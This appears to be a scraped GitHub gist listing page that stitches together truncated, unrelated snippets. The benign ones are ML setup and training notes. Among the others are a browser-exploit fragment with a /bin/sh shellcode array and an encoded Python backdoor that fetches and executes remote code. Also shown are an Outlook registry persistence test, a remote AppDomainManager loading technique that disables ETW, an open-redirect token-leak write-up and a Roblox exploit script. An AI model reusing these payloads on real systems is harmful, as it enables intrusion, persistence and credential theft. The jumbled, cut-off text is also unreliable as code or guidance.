On every machine in the cluster install openmpi and mlx-lm:
conda install conda-forge::openmpi
pip install -U mlx-lmNext download the pipeline parallel run script. Download it to the same path on every machine:
ammondevtek
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ash | |
| # Script to set up PIA wireguard on FreshTomato | |
| # | |
| # Example setup: | |
| # | |
| # scp -O piascript.sh root@<ROUTER_IP>: | |
| # pia_user='<REDACTED>' pia_pass='<REDACTED>' ./piascript.sh | |
| # | |
| # (borrowed from: https://github.com/rveznaver/pia-freshtomato) |
kalomaze
/ gist:37c70e022cb1e9428ebb1ee7a4b52275
Last active
April 5, 2025 10:57
GRPO Reinforcement Learning - 7b GSM8k on 8xH100 / 8xA100
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # the "verifiers" repository is a clean implementation of templated GRPO reinforcement learning training environments | |
| # this is a generic set of "install from scratch" commands complete with a deepspeed z3 config that i have been using when i spin up nodes | |
| # it will run on the gsm8k example w/ default batch size & generation size (8), and the 8th GPU is used for vllm generations | |
| # qwen 14b full finetuning will run on this configuration too without LoRA or CUDA OOM, at least for the gsm8k task's context sizes + generation lengths | |
| # hyperparameters are controlled by `verifiers/utils/config_utils.py`; i have been preferring extreme grad clipping (between 0.001 and 0.01) and low beta (under 0.01) | |
| # NOTE FEB 27: examples have moved into `verifiers/examples` not `/examples` | |
| cd /root | |
| mkdir boom |
qunash
/ grpo_qwen-0-5b_single_t4.ipynb
Last active
October 15, 2025 03:21
grpo_qwen-0-5b_single_t4.ipynb
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
awni
/ mlx_distributed_deepseek.md
Last active
October 6, 2025 13:50
Run DeepSeek R1 or V3 with MLX Distributed
MHaggis
/ Atomic-Specula-reg.ps1
Created
July 29, 2024 20:58
ref - https://github.com/trustedsec/specula
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Atomic Red Team Test: Add URL to Outlook WebView Registry Keys | |
| # Description: This test adds a URL to various Outlook WebView registry keys, which could be used for persistence. | |
| # MITRE ATT&CK Technique: T1112 - Modify Registry | |
| $url = "https://example.com/malicious" | |
| $officeVersions = @("16.0", "15.0", "14.0") | |
| $folders = @("Inbox", "Calendar", "Contacts", "Deleted Items", "Drafts", "Journal", "Junk E-mail", "Notes", "Outbox", "RSS", "Sent Mail", "Tasks", "Today") | |
| foreach ($version in $officeVersions) { | |
| foreach ($folder in $folders) { |
This is a variation of the technique originally discovered by subtee and described here
TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.
This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)
- Copy some binary you love to say,
C:\Test. Lets useaspnet_compiler.exeas an example - Compile
test.cstotest.dllwith a signed strong name, this is required to load an assembly outside of a .NET applications base directory. - Host
test.dllon a remote SMB or HTTP(S) server
DinosaurXxX
/ dark dex v4
Created
March 23, 2020 10:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --[[ | |
| DEX Main Script | |
| Created by: Moon and Courtney | |
| RASPBERRY PI IS A SKIDDY SKID AF | |
| --]] | |
| -- Metas | |
| local Services = setmetatable({},{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
stefanocoding
/ csrf_jwt_redirect_leak.md
Created
May 15, 2019 23:46
An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.
- There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
- User loads https://example.com/?code=VALUE
- Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header
x-csrf-tokenset to the CSRF token for the session of the userGET /verify/VALUE HTTP/1.1 Host: example.com
JohnLaTwC
/ 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22
Created
August 25, 2018 16:41
Python backdoor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded @JohnLaTwC | |
| ## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22 | |
| ## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection | |
| var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm''' | |
| import re | |
| # Matches everything between two texts, returns the first match, Returns: str or False | |
| var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWt |
NewerOlder